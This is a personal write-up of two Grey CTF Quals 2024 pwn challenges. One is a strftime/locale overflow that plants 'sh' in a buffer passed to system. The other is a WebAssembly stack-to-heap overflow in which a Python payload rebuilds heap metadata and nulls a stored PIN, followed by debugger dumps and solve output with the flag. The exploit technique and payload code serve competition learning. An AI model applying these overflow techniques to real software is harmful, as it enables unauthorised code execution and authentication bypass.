Grey CTF Quals 2024 took place on 27 April. I played with slight_smile and got 3rd place locally, qualifying for the finals! I solved all the pwn except for heapheapheap, which is too painpainpain to do :((
Here are my writeups for some of the interesting pwn challenges.
Source code for the challenge:
In this challenge, we can provide arbitrary strftime format strings and also change the locale used to generate the string. The difference between printf and strftime is that strftime only has 1 “argument”: the time. This makes it much safer than a printf format string vulnerability. However, here we have 2 buffers, output and command, where the output buffer is placed before the command buffer in memory. The command buffer is passed to system when we select option 3.
The limit passed to strftime is 0x30, which means that the result will be at most 0x30 bytes long (including the null terminator). memcpy then uses the strlen of that result as the number of bytes to copy into output, which is only 0x20 bytes long. We just need to use specifiers that output more than 2 bytes (since each specifier is 2 bytes) in order to make the result longer than the format string and overflow into command.
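To make the overflow concrete, here is a minimal Python model of the two adjacent buffers. The size of command (0x20) and the helper name copy_result are assumptions for illustration; only the 0x20 size of output and the 0x30 limit come from the challenge.

```python
OUTPUT_SIZE = 0x20   # size of output, from the writeup
COMMAND_SIZE = 0x20  # assumed size of command (not stated in the writeup)
STRFTIME_MAX = 0x30  # limit passed to strftime

def copy_result(memory: bytearray, result: bytes) -> None:
    """Model memcpy(output, result, strlen(result)): nothing checks OUTPUT_SIZE."""
    length = result.index(0) if 0 in result else len(result)
    length = min(length, STRFTIME_MAX - 1)  # strftime caps the result length
    memory[:length] = result[:length]

# output and command laid out back to back, initially zeroed (assumption)
memory = bytearray(OUTPUT_SIZE + COMMAND_SIZE)
copy_result(memory, b"A" * 0x25)

output, command = memory[:OUTPUT_SIZE], memory[OUTPUT_SIZE:]
print(bytes(command[:8]))  # the last 5 bytes of the result spilled into command
```

Anything past the first 0x20 bytes of the formatted time ends up at the start of command.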
The goal is to find a datetime string from a certain locale with sh in it, so we can overflow into the command variable with sh and get RCE. Obviously I’m not Duolingo and I don’t know every language, so I spun up the provided container to get all the available locales on remote.
/ # ls /srv/usr/lib/locale
C.utf8 ca_ES@valencia es_BO gl_ES@euro mnw_MM sq_AL.utf8
aa_DJ ca_FR es_BO.utf8 gu_IN mr_IN sq_MK
...
(there are over 500 so I’m not putting all here)
Then, taking these locales, I looped through a few different format specifiers to see if sh appears in the output.
These few locales gave me sh:
# %A: [*] sq_AL.utf8: b'e shtun\xc3\xab\xbe\xd1\x82\xd0\xb0\x97\xe1\x83\x98\n'
# %c: [*] xh_ZA.utf8: b'Mgq 20 Tsh 2024 08:00:06 UTC\n'
# %b: [*] xh_ZA.utf8: b'Tsh\n'
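A search like this can be sketched locally with Python's standard library, assuming the same locales are installed on the machine running the script. This is a stand-in rather than the script that produced the output above, and find_locales is a hypothetical helper name.

```python
import locale
import time

def find_locales(needle, fmt, locale_names, when):
    """Return (locale, formatted string) pairs whose strftime output contains needle."""
    hits = []
    saved = locale.setlocale(locale.LC_TIME)  # remember the current setting
    try:
        for name in locale_names:
            try:
                locale.setlocale(locale.LC_TIME, name)
            except locale.Error:
                continue  # locale not installed on this machine
            text = time.strftime(fmt, when)
            if needle in text:
                hits.append((name, text))
    finally:
        locale.setlocale(locale.LC_TIME, saved)  # restore the original locale
    return hits

# The date of the CTF; the month name is what matters for %b.
april = time.strptime("2024-04-27", "%Y-%m-%d")
print(find_locales("sh", "%b", ["C", "xh_ZA.utf8", "sq_AL.utf8"], april))
```

The result depends on which locales exist locally, so running it inside the provided container is the safest way to match remote.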
However, because we want the command to be exactly sh, the only one we can use is %b, as the newline will be replaced by \x00. It’s not enough for the datetime to contain sh, it must end with sh. We also need to line up the overflow such that the T stays in output and does not land in the command buffer.
Another way to solve this is to find separate datetime strings that end with h and s, and overflow them individually, such that the following occurs:
round 1 (output is xxxxxh): xxxxxh\x00
round 2 (output is xxxxs): xxxxsh\x00
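The end state of the two rounds can be modelled as below. This only illustrates the byte layout, assuming each round writes just the bytes of its own string and leaves everything after them untouched; the memory is assumed to start zeroed and the padding bytes are placeholders.

```python
OUTPUT_SIZE = 0x20  # size of output, from the writeup

def copy_without_terminator(memory: bytearray, result: bytes) -> None:
    """Model a copy of exactly strlen(result) bytes: no null terminator is written."""
    memory[:len(result)] = result

# output followed by the start of command, assumed zeroed
memory = bytearray(OUTPUT_SIZE + 0x10)

round1 = b"x" * (OUTPUT_SIZE + 1) + b"h"  # 'h' lands in command[1]
round2 = b"x" * OUTPUT_SIZE + b"s"        # 's' lands in command[0], 'h' is left alone

copy_without_terminator(memory, round1)
copy_without_terminator(memory, round2)

command = bytes(memory[OUTPUT_SIZE:]).split(b"\x00")[0]
print(command)  # b'sh'
```

The order matters: the longer string has to go first, so that the shorter one only replaces the byte in front of the h.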
The reason why this works is actually slightly more complicated. At first glance, the output from strftime is always terminated with a null byte, so it shouldn’t be possible to combine multiple strings to form our command. However, because of uninitialized stack, this exploit is actually feasible. According to the strftime docs:
If the total number of resulting bytes including the terminating null byte is not more than maxsize, strftime() shall return the number of bytes placed into the array pointed to by s, not including the terminating null byte. Otherwise, 0 shall be returned and the contents of the array are unspecified.
When the result does not fit, strftime is not required to terminate the output string with a null byte! The stack must align nicely such that print_time is always allocated the same stack frame. Since buf isn’t initialized, the old output from strftime will still be there, and the strlen will be new output + remaining old output. This entire string will then be copied into output and subsequently overflow into command with the “sh” string we want.
During the CTF, I just used the below exploit which only needs 1 round of input, but it only works in April. I’m too lazy to find an exploit that works in May for multiple-round inputs :)
Unfortunately, at the point of making this writeup, it is no longer April and my exploit doesn’t work anymore :(
(also the entire reason for moving grey is so that this chall would be solvable)
This challenge was part 2 of The Motorola.
The main challenge for both parts is in this snippet:
Some context for The Motorola Part 1:
We are supposed to guess the secret PIN which is stored in the heap (our buffer overflow is on the stack, so we can’t overwrite it). We have a scanf buffer overflow, and there’s a win function defined (view_message). We can just ret2win here, no need to leak or overwrite the pin.
The difference is that Motorola 1 was compiled to x86_64, while Motorola 2 is compiled to wasm. Surprisingly (or unsurprisingly), this changes a lot of things under the hood!
To run the binary in GDB, install wasmtime and run the following command:
Now, what’s different about this challenge?
Firstly, RCE is no longer possible. To understand why, we need to dive into how wasm control flow works.
Functions are natively typed in wasm. If you run wasm2wat on the binary, you can see a lot of generic function types:
For example, slow_type is compiled as a type 7 function, which takes in 1 i32 parameter and returns nothing.
When a call is made from a parent function, the instruction is simply call $slow_type. This is a little similar to call in x86 assembly. The current instruction address is pushed onto the call stack, which is a separate stack of instruction pointers used to continue execution after call and call_indirect. This stack lives outside the memory the VM exposes to the program, so it’s generally not possible to hijack it. The arguments to the function are pushed onto the top of the stack, and these arguments become the start of the locals array which can be accessed within the function (eg. local.get 14 will get the 15th local). When the function is finished, the return value(s) are pushed onto the stack and the parent function continues execution based on the call stack.
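As a rough mental model (a toy, not how wasmtime is implemented), the separation looks like this: stores from the guest can only reach linear memory, while return addresses sit in a structure the guest has no instruction to address. ToyVM and the return address used here are hypothetical.

```python
class ToyVM:
    """Toy model: guest code can only touch linear memory, never the call stack."""

    def __init__(self, memory_size):
        self.memory = bytearray(memory_size)  # the guest's entire address space
        self._call_stack = []                 # return addresses, held by the host

    def call(self, return_address):
        """Record where to resume; the guest never sees this value."""
        self._call_stack.append(return_address)

    def store(self, address, data):
        """Guest store: bounds-checked against linear memory only."""
        if address < 0 or address + len(data) > len(self.memory):
            raise MemoryError("trap: out-of-bounds memory access")
        self.memory[address:address + len(data)] = data

    def ret(self):
        return self._call_stack.pop()

vm = ToyVM(0x1000)
vm.call(0x757B)                # hypothetical return address
vm.store(0x100, b"A" * 0xF00)  # a huge overflow, all inside linear memory
print(hex(vm.ret()))           # 0x757b: the return address is untouched
```

However far the overflow runs, it either stays inside the bytearray or traps at its end.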
Here’s a demo, breaking on the slow_type function:
Trace:
0 0x7ffff5bd70f0
1 0x7ffff5bd757b
2 0x7ffff5bd78c0
3 0x7ffff5bd70b1
4 0x7ffff5bed4ba
pwndbg> stack
+000 rsp 0x7fffffffbb28 —▸ 0x7ffff5bd757b ◂— mov dword ptr [r14 + 0x1d0], r15d
...
+048 0x7fffffffbb68 —▸ 0x7ffff5bd78c0 ◂— xor eax, eax
...
+068 0x7fffffffbb88 —▸ 0x7ffff5bd70b1 ◂— mov rbx, rax
The value pointed to by rsp (the rsp of the VM, not of the sandboxed program!) is a return address which, if we check the disassembly, belongs to the login function.
Dump of assembler code for function login:
0x00007ffff5bd7410 <+0>: push rbp
0x00007ffff5bd7411 <+1>: mov rbp,rsp
0x00007ffff5bd7414 <+4>: mov r10,QWORD PTR [rdi+0x8]
...
0x00007ffff5bd757b <+363>: mov DWORD PTR [r14+0x1d0],r15d
0x00007ffff5bd7582 <+370>: mov rbx,QWORD PTR [rsp]
0x00007ffff5bd7586 <+374>: mov r12,QWORD PTR [rsp+0x8]
0x00007ffff5bd758b <+379>: mov r13,QWORD PTR [rsp+0x10]
0x00007ffff5bd7590 <+384>: mov r14,QWORD PTR [rsp+0x18]
0x00007ffff5bd7595 <+389>: mov r15,QWORD PTR [rsp+0x20]
0x00007ffff5bd759a <+394>: add rsp,0x30
0x00007ffff5bd759e <+398>: mov rsp,rbp
0x00007ffff5bd75a1 <+401>: pop rbp
0x00007ffff5bd75a2 <+402>: ret
0x00007ffff5bd75a3 <+403>: ud2
(side note, all user-defined functions live in this address space):
0x7ffff5b96000 0x7ffff5bd6000 rw-p 40000 0 [anon_7ffff5b96]
0x7ffff5bd6000 0x7ffff5bd7000 r--p 1000 0 [anon_7ffff5bd6]
0x7ffff5bd7000 0x7ffff5bee000 r-xp 17000 0 [anon_7ffff5bd7] <-- function page
0x7ffff5bee000 0x7ffff5c54000 r--p 66000 0 [anon_7ffff5bee]
0x7ffff5c54000 0x7ffff5c55000 ---p 1000 0 [anon_7ffff5c54]
Presumably, this region is writable at some point during VM initialization, when the wasm is “JIT” compiled to x86_64 and written into it.
Another thing - you might have noticed by now that wasm doesn’t really have a concept of registers. Rather (similar to python bytecode!), it stores most values on the stack (in fact, its entire memory is just a huge array, a contiguous block of memory). And our “stack” (the entire linear memory region within the VM) is found in this memory region:
0x7ffdb0000000 0x7ffe30000000 ---p 80000000 0 [anon_7ffdb0000]
0x7ffe30000000 0x7ffe30002000 rw-p 2000 0 /memfd:wasm-memory-image (deleted)
0x7ffe30002000 0x7ffe30020000 rw-p 1e000 0 [anon_7ffe30002] <-- our linear memory region
0x7ffe30020000 0x7fffb0000000 ---p 17ffe0000 0 [anon_7ffe30020]
0x7fffb0000000 0x7fffb0089000 rw-p 89000 0 [anon_7fffb0000]
Anyway, the point of all this is to show that RIP control isn’t possible with regular call, because the call stack is isolated far far away from the VM’s accessible memory.
What about call_indirect? It takes a function index from the stack, looks it up in the function table, and calls the function with the corresponding index. The main purpose is to support C function pointers (eg. fclose, which reads the close function for the target file from the FILE struct, which can only be known at runtime). Since the arguments must be passed in through the stack, and their types are known at compile time, wasm is smart about this and requires the function signature in call_indirect. For example:
will crash if the function index at the top of stack references a function that isn’t of type 0. This greatly restricts the functions we can jump to.
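The signature check can be pictured with a small Python model. This is a simplification of what a runtime does, with signatures modelled as plain tuples; get_answer, the table layout and the Trap class are hypothetical.

```python
class Trap(Exception):
    """Stands in for a wasm trap."""

# Signatures modelled as (parameter types, result types).
TYPE_I32_TO_NONE = (("i32",), ())
TYPE_NONE_TO_I32 = ((), ("i32",))

def slow_type(text_ptr):  # one i32 parameter, no result
    return None

def get_answer():         # hypothetical function with a different signature
    return 42

# The function table: each entry carries its signature alongside the function.
TABLE = [
    (TYPE_I32_TO_NONE, slow_type),
    (TYPE_NONE_TO_I32, get_answer),
]

def call_indirect(expected_type, index, *args):
    """Call TABLE[index] only if its signature matches the one in the instruction."""
    if not 0 <= index < len(TABLE):
        raise Trap("undefined table element")
    actual_type, func = TABLE[index]
    if actual_type != expected_type:
        raise Trap("indirect call type mismatch")
    return func(*args)

print(call_indirect(TYPE_NONE_TO_I32, 1))  # signature matches, the call goes through
try:
    call_indirect(TYPE_NONE_TO_I32, 0)     # attacker-chosen index, wrong signature
except Trap as exc:
    print("trap:", exc)
```

Even with full control of the index, an attacker can only reach functions that share the signature hardcoded at the call site.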
Unfortunately, we don’t have call_indirect in the login function. This is the disassembly for login:
So, RCE is out of the question. How else can we exploit the buffer overflow? We can’t overwrite the pin, because it’s stored in the heap, far away from the stack…right?
Actually, since wasm was designed to be sandboxed, the linear memory region/array is kept as small as possible, without the usual gaps between pages like the stack and heap that we see in regular x86_64 binaries. This means that the stack and heap might actually be contiguous! Let’s check how the stack and heap are set up, by setting a known PIN and known attempt, and searching for the 2 values in memory:
(I set the pin to TESTPINTESTPINTESTPINTESTPINTESTPIN)
pwndbg> search -t bytes TESTPINTESTPINTESTPINTESTPINTESTPIN
[anon_7ffe30002] 0x7ffe300127e0 'TESTPINTESTPINTESTPINTESTPINTESTPIN\n'
pwndbg> search -t bytes asdf
[anon_7ffe30002] 0x7ffe300122d0 0x66647361 /* 'asdf' */
pwndbg> p/x 0x7ffe300127e0 - 0x7ffe300122d0
$1 = 0x510
As we can see, the saved pin value is 0x510 bytes after our input buffer! The reason why the heap is placed after the stack is (I think) that the stack is the first region to be defined, while the heap is only created after the first malloc call. So, wasm simply defines regions sequentially in the memory space, hence putting the heap after the stack.
This way, the challenge becomes similar to a strcmp challenge - just spam null bytes between input and saved pin, and we should be good to go, right?
● ctf/comp/2024-H0/greyctf/the-motorala-2
$ : python3 solve.py
[+] Opening connection to challs.nusgreyhats.org on port 30212: Done
[*] Switching to interactive mode
After several intense attempts, you successfully breach the phone's defenses.
Unlocking its secrets, you uncover a massive revelation that holds the power to reshape everything.
The once-elusive truth is now in your hands, but little do you know, the plot deepens, and the journey through the
clandestine hideout takes an unexpected turn, becoming even more complicated.
\x1b[0m
[*] Got EOF while reading in interactive
We are in fact not good to go - it crashed without printing the flag :(
Let’s take a closer look at the region between input and PIN:
pwndbg> tel 0x7ffe300122d0
00:0000│ 0x7ffe300122d0 ◂— 0x66647361 /* 'asdf' */
01:0008│ 0x7ffe300122d8 ◂— 0
... ↓ 5 skipped
07:0038│ 0x7ffe30012308 ◂— 0x1100000000
08:0040│ 0x7ffe30012310 ◂— 0x18e0000018e0
09:0048│ 0x7ffe30012318 ◂— 0x3200000010
0a:0050│ 0x7ffe30012320 ◂— 0x300012350
0b:0058│ 0x7ffe30012328 ◂— 0
... ↓ 3 skipped
0f:0078│ 0x7ffe30012348 ◂— 0x1300000000
10:0080│ 0x7ffe30012350 ◂— 0
11:0088│ 0x7ffe30012358 ◂— 0x48100000000
12:0090│ 0x7ffe30012360 ◂— 0x1235800012358
13:0098│ 0x7ffe30012368 ◂— 0
14:00a0│ 0x7ffe30012370 ◂— 0x4000019e8
15:00a8│ 0x7ffe30012378 ◂— 0x300000000
16:00b0│ 0x7ffe30012380 ◂— 0x100000002
17:00b8│ 0x7ffe30012388 ◂— 0x400000123d8
18:00c0│ 0x7ffe30012390 ◂— 0
19:00c8│ 0x7ffe30012398 ◂— 0xffffffff00000004
1a:00d0│ 0x7ffe300123a0 ◂— 0xffffffff
1b:00d8│ 0x7ffe300123a8 ◂— 0
... ↓ 133 skipped
a1:0508│ 0x7ffe300127d8 ◂— 0x5200000480
a2:0510│ 0x7ffe300127e0 ◂— 'TESTPINTESTPINTESTPINTESTPINTESTPIN\n'
a3:0518│ 0x7ffe300127e8 ◂— 'ESTPINTESTPINTESTPINTESTPIN\n'
a4:0520│ 0x7ffe300127f0 ◂— 'STPINTESTPINTESTPIN\n'
a5:0528│ 0x7ffe300127f8 ◂— 'TPINTESTPIN\n'
a6:0530│ 0x7ffe30012800 ◂— 0xa4e4950 /* 'PIN\n' */
Most likely, we overwrote some important values here that should not be 0, hence crashing the program. These values are probably the heap metadata used to maintain the heap, which explains why the program crashed when we tried to read the flag file.
Luckily, wasm sandboxing once again works to our advantage. Since addresses are simply offsets from the start of the virtualized memory region, there’s no PIE or ASLR involved, so we can just hardcode all the values - whether addresses or chunk size values - without needing to leak anything! It took me a while to copy the values over into the exploit script, but this is the final exploit:
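The idea can be sketched as follows. This is an illustration built from the telescope dump above, not the script that produced the output below: it zero-fills the gap, writes every non-zero qword from the dump back at its original offset, and ends with a null byte on the first byte of the PIN. It assumes the comparison is strcmp-like and that the input is read with a scanf %s style call that stops at whitespace.

```python
import struct

PIN_OFFSET = 0x510  # distance from the input buffer to the saved PIN

# Non-zero qwords between the input and the PIN, copied from the telescope dump
# (offset from the input buffer -> value).
SAVED_QWORDS = {
    0x038: 0x1100000000,
    0x040: 0x18E0000018E0,
    0x048: 0x3200000010,
    0x050: 0x300012350,
    0x078: 0x1300000000,
    0x088: 0x48100000000,
    0x090: 0x1235800012358,
    0x0A0: 0x4000019E8,
    0x0A8: 0x300000000,
    0x0B0: 0x100000002,
    0x0B8: 0x400000123D8,
    0x0C8: 0xFFFFFFFF00000004,
    0x0D0: 0xFFFFFFFF,
    0x508: 0x5200000480,
}

def build_payload() -> bytes:
    """Zero-filled overflow that restores the dumped qwords and empties the PIN."""
    payload = bytearray(PIN_OFFSET + 1)  # the final zero byte lands on PIN[0]
    for offset, value in SAVED_QWORDS.items():
        payload[offset:offset + 8] = struct.pack("<Q", value)
    return bytes(payload)

payload = build_payload()
# A %s-style read stops at whitespace, so none may appear in the payload.
assert not any(b in payload for b in b"\t\n\x0b\x0c\r ")
print(hex(len(payload)))  # 0x511
```

Because the offsets and values are the same on every run, they can be hardcoded like this with no leak.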
$ : python3 solve.py
[+] Opening connection to challs.nusgreyhats.org on port 30212: Done
[*] Switching to interactive mode
After several intense attempts, you successfully breach the phone's defenses.
Unlocking its secrets, you uncover a massive revelation that holds the power to reshape everything.
The once-elusive truth is now in your hands, but little do you know, the plot deepens, and the journey through the
clandestine hie
$out takes an unexpected turn, becoming even more complicated.
\x1b[0m
grey{s1mpl3_buff3r_0v3rfl0w_w4snt_1t?_r3m3mb3r_t0_r34d_th3_st0ryl1ne:)}
Very cool challenge that inspired me to learn more about wasm! :)